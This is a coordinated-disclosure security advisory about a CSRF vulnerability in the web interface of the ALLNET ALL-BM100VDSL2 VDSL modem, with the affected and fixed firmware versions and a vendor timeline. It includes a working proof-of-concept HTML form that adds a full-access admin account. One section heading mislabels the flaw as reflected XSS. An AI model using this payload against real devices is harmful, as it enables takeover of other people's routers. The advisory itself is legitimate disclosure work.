VDSL Client Modem ALL-BM100VDSL2: CSRF

VDSL Client Modem ALL-BM100VDSL2: CSRF

Date: 2017-04-13 14:09:15
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: VDSL Client Modem ALL-BM100VDSL2 C.4.6a
Fixed in: C.4.8a
Fixed Version Link: http://www.allnet.de/nc/de/allnet-brand/support/treiber-firmware/download/120183/
Vendor Website: http://www.allnet.de/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 12/20/2016
Disclosed to public: 04/13/2017
Release mode: Coordinated Release
CVE: n/a (not requested)
Credits Tim Coen & Marcus Gruber of Curesec GmbH

2. Overview

The web interface of the VDSL Client Modem ALL-BM100VDSL2 is vulnerable to CSRF.

3. Details

Reflected XSS

CVSS: High 8.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Description: The web interface does not have any CSRF protection. It is for example possible to add a new admin user with full access.

Proof of Concept:

<html> <body> <form action="http://192.168.16.254/goform/ifx_set_system_password" method="POST"> <input type="hidden" name="page" value="system_password.htm" /> <input type="hidden" name="curr_user_id" value="1" /> <input type="hidden" name="submitflag" value="1" /> <input type="hidden" name="users" value="<New User>" /> <input type="hidden" name="userEnable" value="1" /> <input type="hidden" name="userNew" value="admin2" /> <input type="hidden" name="user_passwd_edit_enable" value="1" /> <input type="hidden" name="userNewPswd" value="admin" /> <input type="hidden" name="userConPswd" value="admin" /> <input type="hidden" name="userLaccess" value="1" /> <input type="hidden" name="userRaccess" value="1" /> <input type="hidden" name="userFTPaccess" value="1" /> <input type="hidden" name="userSMBaccess" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>

4. Solution

To mitigate this issue please upgrade at least to version C.4.8a:

http://www.allnet.de/nc/de/allnet-brand/support/treiber-firmware/download/120183/

Please note that a newer version might already be available.

5. Report Timeline

12/20/2016 Informed Vendor about Issue
12/23/2016 Vendor announces release of new firmware
02/15/2017 Reminded Vendor about disclosure date
03/01/2017 Vendor releases new Version
04/13/2017 Disclosed to public